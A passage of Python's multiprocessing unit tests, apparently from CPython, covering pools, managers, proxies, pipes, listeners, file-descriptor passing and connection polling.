indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
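# Helper callables used by the Pool tests below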
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
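# Counts live instances via __new__/__del__ so that test_release_task_refs can
# check that the pool drops its references to task arguments and results.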
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
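# Yields 0..total-1 but raises SayWhenError once i == when (immediately if
# when == -1); used to check that map/imap propagate errors from the iterable.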
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very start of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.time()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.time() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_del_pool(self):
p = self.Pool(1)
wr = weakref.ref(p)
del p
gc.collect()
self.assertIsNone(wr())
def raising():
raise KeyError("key")
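# A lambda cannot be pickled, so a worker returning one triggers
# MaybeEncodingError on the result path (see test_unpickleable_result).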
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
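# Proxy that exposes only __next__, so the generator returned by baz() can be
# iterated from the client side of the manager.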
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
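# Serialize with xmlrpclib instead of pickle; it supports far fewer types,
# which _TestRemoteManager.test_remote relies on.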
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(test.support.HOST, 0), authkey=authkey, serializer=SERIALIZER)
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
manager.shutdown()
#
#
#
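# An empty byte string is the sentinel that tells the _echo child loop to stop.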
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16 MiB
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
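# When create_dummy_fds is true, _writefd first fills every unassigned fd below
# 256, so the handle received via reduction.recv_handle lands on a large fd
# (exercised by test_large_fd_transfer).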
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle. This causes
# ConnectNamedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
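#
# Tests for Connection.poll() and message boundaries
#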
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.socket()
l.bind((test.support.HOST, 0))
l.listen()
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
